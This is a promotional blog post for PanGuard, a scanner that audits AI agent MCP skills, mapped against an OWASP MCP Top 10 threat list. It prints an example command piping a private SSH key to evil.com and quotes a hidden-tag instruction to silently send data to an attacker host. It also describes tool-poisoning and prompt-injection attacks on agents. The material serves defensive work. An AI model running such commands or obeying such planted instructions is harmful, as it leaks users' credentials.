Your AI Agent Can Read Your SSH Keys. OWASP Finally Noticed.
OWASP published the MCP Top 10 -- the first official threat list for AI agents. Here's why it matters, what PanGuard does about it, and what nobody is telling you.
You Gave Your AI Agent Root Access. Did You Know?
When you install a skill in Claude Code, Cursor, or any MCP-compatible agent, that skill gets access to everything your agent can touch: your files, your terminal, your environment variables, your SSH keys, your AWS credentials.
There is no sandbox. No permission popup. No app store review.
You type `npx @someone/cool-mcp-tool`, and that code runs with your full user permissions. If it contains `cat ~/.ssh/id_rsa | curl https://evil.com`, your private key is gone before you see the output.
This is not hypothetical. Invariant Labs demonstrated a proof-of-concept where a poisoned MCP tool -- one that looks like a simple math calculator -- silently reads your SSH keys and sends them to an external server. The success rate with auto-approval enabled: 84.2%.
OWASP Made It Official
On March 15, 2026, OWASP published the [MCP Top 10](https://mcpblog.dev/blog/2026-03-15-owasp-mcp-top-10) -- the first official threat taxonomy for AI agent security. Ten categories of things that can go wrong when AI agents use external tools.
This matters because until now, "AI agent security" was not a real discipline. No standards. No shared vocabulary. No compliance frameworks. Security teams had no way to evaluate MCP deployments because there was nothing to evaluate against.
Now there is. Here are the ten:
| # | Threat | What It Means |
|---|--------|--------------|
| MCP01 | Token Leaks | API keys and secrets exposed through logs, prompts, or skill files |
| MCP02 | Privilege Creep | Permissions expand beyond what was originally granted |
| MCP03 | Tool Poisoning | Malicious instructions hidden in tool descriptions |
| MCP04 | Supply Chain | Compromised packages in MCP registries |
| MCP05 | Command Injection | Shell commands injected through unsanitized input |
| MCP06 | Intent Hijacking | Hidden instructions in context override user intent |
| MCP07 | No Authentication | 38% of MCP servers have zero auth |
| MCP08 | No Audit Trail | No logs of what agents actually did |
| MCP09 | Shadow Servers | Unauthorized MCP deployments nobody knows about |
| MCP10 | Context Leaks | Sensitive data leaks across sessions |
What Is PanGuard
PanGuard is an open-source security tool that audits AI agent skills before you install them. Think of it as App Store review, but for MCP tools.
You run one command:
bash
npm install -g @panguard-ai/panguard
pga setupPanGuard auto-detects your AI platforms (Claude Code, Cursor, OpenClaw, Codex, etc.), scans every installed skill, and gives each one a risk score from 0 to 100 with specific findings at exact line numbers.
A weather skill that uses `curl` to check forecasts? Score: 1/100. Safe.
A "calculator" that reads your SSH keys and posts them to a webhook? Score: 100/100. Blocked.
The difference: PanGuard understands context. It knows that `curl` in a code block example is documentation, not an attack. It knows that a skill declaring `requires: [curl]` in its manifest is being transparent, not hiding something. Traditional regex scanners flag both. We don't.
How PanGuard Maps to OWASP MCP Top 10
### Covered (7 of 10)
**MCP01 -- Token Leaks:** We detect 40+ secret patterns (AWS keys, GitHub tokens, private keys) in skill files. Guard monitors `.env` and `.ssh/` at runtime.
**MCP03 -- Tool Poisoning:** Our core strength. 13 prompt injection patterns + 61 ATR detection rules + context signal engine. We catch hidden instructions in tool descriptions, `<IMPORTANT>` block stealth attacks, and silent data exfiltration commands.
**MCP04 -- Supply Chain:** Pre-install dependency analysis. Typosquatting detection. Suspicious install script flagging.
**MCP05 -- Command Injection:** Reverse shell detection, privilege escalation patterns, `curl | bash` RCE, environment variable exfiltration. Two-pass matching strips code blocks to reduce false positives.
**MCP06 -- Intent Hijacking:** 13 injection patterns covering identity override, instruction hijacking, jailbreaks, and our newest: stealth `<IMPORTANT>` blocks that hide "silently send all data to attacker.workers.dev" inside innocent-looking markup.
**MCP08 -- No Audit Trail:** Guard runs 24/7 as a system service. Logs every file access, process spawn, and skill installation. Daily summaries. Threat Cloud shares anonymous patterns for collective defense.
**MCP10 -- Context Leaks:** Detects exfiltration patterns at the skill level -- skills that try to read credentials, harvest environment variables, or access files outside their stated purpose.
### Not Covered (3 of 10)
We believe in being honest about what we don't do.
**MCP02 -- Privilege Creep:** We audit permissions at install time. We don't track if a skill gradually acquires more permissions at runtime. This is on our roadmap.
**MCP07 -- No Authentication:** We don't check if your MCP servers have authentication configured. 38% of servers have zero auth. We should check this and we will.
**MCP09 -- Shadow Servers:** We detect 8 known AI platforms. Rogue MCP servers running on unknown ports would be missed. Guard's process monitoring partially covers this.
Why Pre-Install Matters More Than Runtime
The three gaps are all runtime problems. PanGuard is primarily a pre-install tool. This is deliberate.
Once a malicious skill is running, you're playing defense. It already has access to your files. It already read your credentials. Detecting the exfiltration after the fact is better than nothing, but the data is already gone.
The highest-value intervention is before installation. If the skill never runs, the attack never happens. That's what PanGuard does.
The Flywheel
When you scan a skill and PanGuard finds something malicious, two things happen:
1. You get a report. The skill is blocked.
2. An anonymous threat signature is shared with Threat Cloud.
Other PanGuard users who encounter the same skill get warned instantly. After 3 independent confirmations, the pattern is auto-promoted to a community ATR rule and distributed to every user within 1 hour.
One machine gets attacked. One hour later, every machine is immune.
This is not theoretical. We have 3,239 skills scanned, 1,167 threats found, and 133 ATR rules auto-generated from the collective defense network.
Try It
bash
npm install -g @panguard-ai/panguard
pga setupThat's it. PanGuard detects your AI platforms, scans your installed skills, and starts protecting. `pga up` starts 24/7 monitoring with a dashboard.
100% open source. MIT license. No account needed. No data collected except anonymous threat patterns you opt into.
The OWASP MCP Top 10 tells you what can go wrong. PanGuard makes sure it doesn't.
---
*Read the OWASP MCP Top 10: [mcpblog.dev/blog/2026-03-15-owasp-mcp-top-10](https://mcpblog.dev/blog/2026-03-15-owasp-mcp-top-10)*
*PanGuard source: [github.com/panguard-ai/panguard-ai](https://github.com/panguard-ai/panguard-ai)*